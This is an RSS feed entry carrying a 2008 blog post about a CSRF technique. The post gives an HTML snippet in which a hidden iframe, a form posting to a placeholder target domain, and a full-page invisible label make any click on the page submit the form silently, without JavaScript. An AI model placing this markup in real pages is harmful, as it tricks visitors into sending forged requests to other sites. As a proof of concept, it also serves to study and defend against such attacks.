trickeries! » evil http://trickeries.com it's tricky to rock a style thats liked online Tue, 02 Mar 2010 06:01:56 +0000 http://wordpress.org/?v=2.9.2 en hourly 1 An interesting CSRF attack http://trickeries.com/216/an-interesting-csrf-attack/ http://trickeries.com/216/an-interesting-csrf-attack/#comments Tue, 02 Sep 2008 06:25:57 +0000 atom http://trickeries.com/?p=216 I found this post very interesting for a number of reasons.  Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening.  After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example.  Plenty of nastniess can ensue.

<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
	<p>
		<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0">&nbsp;</label>
		<input type="submit" id="submit" style="display:none"/>
	</p>
</form>
]]> http://trickeries.com/216/an-interesting-csrf-attack/feed/ 5